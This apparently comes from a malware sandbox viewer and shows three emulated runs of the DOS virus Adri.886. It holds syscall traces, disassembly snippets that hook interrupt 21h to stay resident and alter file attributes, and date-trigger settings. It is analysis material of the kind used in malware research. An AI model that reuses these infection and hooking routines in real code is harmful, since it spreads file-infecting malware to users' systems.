Sample viewer

vx.netlux.org/Virus.DOS.Adri.886

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:49:14.629078719Z	98	PC: 13724 \| Get current PSP
2018-12-17T22:49:14.630752343Z	42	PC: 1372c \| Get date 0x1372c: cmp dh, 0xa 0x1372f: je 0x13734 0x13731: call 0x137d9 0x13734: xor di, di 0x13736: mov ax, 0x4b00 0x13739: loop 0x13734 0x1373b: add ax, 0x70 0x1373e: int 0x21 0x13740: cmp al, 0xcc 0x13742: je 0x137b6 0x13744: mov ah, 0x62 0x13746: int 0x21 0x13748: mov ax, bx 0x1374a: dec ax 0x1374b: mov dx, ax 0x1374d: mov es, ax 0x1374f: mov bh, byte ptr es:[0] 0x13754: mov ax, word ptr es:[3] 0x13758: add ax, dx 0x1375a: inc ax
2018-12-17T22:49:14.960134241Z	75	PC: 13740 \| Execute program
2018-12-17T22:49:14.961574346Z	98	PC: 13748 \| Get current PSP
2018-12-17T22:49:14.962754323Z	42	PC: 13791 \| Get date 0x13791: mov byte ptr es:[0x32], dh 0x13796: xor dx, dx 0x13798: mov ds, dx 0x1379a: lds ax, ptr [0x84] 0x1379e: mov di, 0x3b5 0x137a1: mov word ptr es:[di], ax 0x137a4: mov word ptr es:[di + 2], ds 0x137a8: mov ds, dx 0x137aa: cli 0x137ab: mov ax, 0x12c 0x137ae: mov word ptr [0x84], ax 0x137b1: mov word ptr [0x86], es 0x137b5: sti 0x137b6: pop ds 0x137b7: pop es 0x137b8: push ss 0x137b9: pop ax 0x137ba: sub ax, 0x37 0x137bd: mov ss, ax 0x137bf: push cs
2018-12-17T22:49:14.965904311Z	48	PC: 12a54 \| Get DOS version
2018-12-17T22:49:14.967176652Z	74	PC: 12ad3 \| Reallocate memory
2018-12-17T22:49:14.969343162Z	53	PC: 12b51 \| Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:49:14.979724958Z	37	PC: 12b63 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:49:14.98090762Z	68	PC: 12bf3 \| I/O control for devices (Set for = '/[r��׹��2��E�$� �!�E�')
2018-12-17T22:49:14.982117383Z	68	PC: 12bf3 \| I/O control for devices
2018-12-17T22:49:14.985643328Z	68	PC: 12bf3 \| I/O control for devices
2018-12-17T22:49:14.98697517Z	68	PC: 12bf3 \| I/O control for devices
2018-12-17T22:49:14.988384428Z	68	PC: 12bf3 \| I/O control for devices
2018-12-17T22:49:14.991109709Z	74	PC: 1317e \| Reallocate memory
2018-12-17T22:49:14.993121559Z	48	PC: 1327d \| Get DOS version
2018-12-17T22:49:14.994734459Z	72	PC: 13433 \| Allocate memory
2018-12-17T22:49:14.998211912Z	41	PC: 134a8 \| Parse filename
2018-12-17T22:49:14.999594921Z	41	PC: 134b0 \| Parse filename
2018-12-17T22:49:15.00105284Z	53	PC: 9f95b \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:15.002667705Z	37	PC: 9f95b \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:15.004339455Z	67	PC: 9f95b \| Get or set file attributes
2018-12-17T22:49:15.011340839Z	37	PC: 9f95b \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:15.012999205Z	75	PC: 1347d \| Execute program
2018-12-17T22:49:15.020525426Z	37	PC: 12cc3 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:49:15.021875112Z	76	PC: 12ca8 \| Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9827,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:51.120097106Z	98	PC: 13724 \| Get current PSP
2018-12-25T12:23:51.120999167Z	42	PC: 1372c \| Get date 0x1372c: cmp dh, 0xa 0x1372f: je 0x13734 0x13731: call 0x137d9 0x13734: xor di, di 0x13736: mov ax, 0x4b00 0x13739: loop 0x13734 0x1373b: add ax, 0x70 0x1373e: int 0x21 0x13740: cmp al, 0xcc 0x13742: je 0x137b6 0x13744: mov ah, 0x62 0x13746: int 0x21 0x13748: mov ax, bx 0x1374a: dec ax 0x1374b: mov dx, ax 0x1374d: mov es, ax 0x1374f: mov bh, byte ptr es:[0] 0x13754: mov ax, word ptr es:[3] 0x13758: add ax, dx 0x1375a: inc ax
2018-12-25T12:23:51.472853428Z	75	PC: 13740 \| Execute program
2018-12-25T12:23:51.480026015Z	98	PC: 13748 \| Get current PSP
2018-12-25T12:23:51.481201606Z	42	PC: 13791 \| Get date 0x13791: mov byte ptr es:[0x32], dh 0x13796: xor dx, dx 0x13798: mov ds, dx 0x1379a: lds ax, ptr [0x84] 0x1379e: mov di, 0x3b5 0x137a1: mov word ptr es:[di], ax 0x137a4: mov word ptr es:[di + 2], ds 0x137a8: mov ds, dx 0x137aa: cli 0x137ab: mov ax, 0x12c 0x137ae: mov word ptr [0x84], ax 0x137b1: mov word ptr [0x86], es 0x137b5: sti 0x137b6: pop ds 0x137b7: pop es 0x137b8: push ss 0x137b9: pop ax 0x137ba: sub ax, 0x37 0x137bd: mov ss, ax 0x137bf: push cs
2018-12-25T12:23:51.485380364Z	48	PC: 12a54 \| Get DOS version
2018-12-25T12:23:51.487036155Z	74	PC: 12ad3 \| Reallocate memory
2018-12-25T12:23:51.489905801Z	53	PC: 12b51 \| Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.492474022Z	37	PC: 12b63 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.493910669Z	68	PC: 12bf3 \| I/O control for devices (Set for = '/[r��׹��2��E�$� �!�E�')
2018-12-25T12:23:51.495474468Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.497993773Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.499995346Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.502369864Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.505372043Z	74	PC: 1317e \| Reallocate memory
2018-12-25T12:23:51.508873128Z	48	PC: 1327d \| Get DOS version
2018-12-25T12:23:51.512070978Z	72	PC: 13433 \| Allocate memory
2018-12-25T12:23:51.514174346Z	41	PC: 134a8 \| Parse filename
2018-12-25T12:23:51.516592063Z	41	PC: 134b0 \| Parse filename
2018-12-25T12:23:51.518413348Z	53	PC: 9f95b \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:51.519809185Z	37	PC: 9f95b \| Set interrupt vector (See above)
2018-12-25T12:23:51.524933194Z	67	PC: 9f95b \| Get or set file attributes (See above)
2018-12-25T12:23:51.531747828Z	37	PC: 9f95b \| Set interrupt vector (See above)
2018-12-25T12:23:51.533262177Z	75	PC: 1347d \| Execute program
2018-12-25T12:23:51.54172696Z	37	PC: 12cc3 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.543254697Z	76	PC: 12ca8 \| Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9827,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:51.65201983Z	98	PC: 13724 \| Get current PSP
2018-12-25T12:23:51.653912894Z	42	PC: 1372c \| Get date 0x1372c: cmp dh, 0xa 0x1372f: je 0x13734 0x13731: call 0x137d9 0x13734: xor di, di 0x13736: mov ax, 0x4b00 0x13739: loop 0x13734 0x1373b: add ax, 0x70 0x1373e: int 0x21 0x13740: cmp al, 0xcc 0x13742: je 0x137b6 0x13744: mov ah, 0x62 0x13746: int 0x21 0x13748: mov ax, bx 0x1374a: dec ax 0x1374b: mov dx, ax 0x1374d: mov es, ax 0x1374f: mov bh, byte ptr es:[0] 0x13754: mov ax, word ptr es:[3] 0x13758: add ax, dx 0x1375a: inc ax
2018-12-25T12:23:51.656664606Z	75	PC: 13740 \| Execute program
2018-12-25T12:23:51.658400414Z	98	PC: 13748 \| Get current PSP
2018-12-25T12:23:51.660999774Z	42	PC: 13791 \| Get date 0x13791: mov byte ptr es:[0x32], dh 0x13796: xor dx, dx 0x13798: mov ds, dx 0x1379a: lds ax, ptr [0x84] 0x1379e: mov di, 0x3b5 0x137a1: mov word ptr es:[di], ax 0x137a4: mov word ptr es:[di + 2], ds 0x137a8: mov ds, dx 0x137aa: cli 0x137ab: mov ax, 0x12c 0x137ae: mov word ptr [0x84], ax 0x137b1: mov word ptr [0x86], es 0x137b5: sti 0x137b6: pop ds 0x137b7: pop es 0x137b8: push ss 0x137b9: pop ax 0x137ba: sub ax, 0x37 0x137bd: mov ss, ax 0x137bf: push cs
2018-12-25T12:23:51.663546876Z	48	PC: 12a54 \| Get DOS version
2018-12-25T12:23:51.665624824Z	74	PC: 12ad3 \| Reallocate memory
2018-12-25T12:23:51.668770366Z	53	PC: 12b51 \| Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.67108509Z	37	PC: 12b63 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.672659377Z	68	PC: 12bf3 \| I/O control for devices (Set for = '/[r��׹��2��E�$� �!�E�')
2018-12-25T12:23:51.674795205Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.676782216Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.678181431Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.680950042Z	68	PC: 12bf3 \| I/O control for devices (See above)
2018-12-25T12:23:51.683491792Z	74	PC: 1317e \| Reallocate memory
2018-12-25T12:23:51.691241327Z	48	PC: 1327d \| Get DOS version
2018-12-25T12:23:51.693077918Z	72	PC: 13433 \| Allocate memory
2018-12-25T12:23:51.695811391Z	41	PC: 134a8 \| Parse filename
2018-12-25T12:23:51.697581084Z	41	PC: 134b0 \| Parse filename
2018-12-25T12:23:51.699569625Z	53	PC: 9f95b \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:51.701874325Z	37	PC: 9f95b \| Set interrupt vector (See above)
2018-12-25T12:23:51.703086862Z	67	PC: 9f95b \| Get or set file attributes (See above)
2018-12-25T12:23:51.70894713Z	37	PC: 9f95b \| Set interrupt vector (See above)
2018-12-25T12:23:51.710815556Z	75	PC: 1347d \| Execute program
2018-12-25T12:23:51.718405485Z	37	PC: 12cc3 \| Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:51.720046053Z	76	PC: 12ca8 \| Terminate with return code (Return code = '2')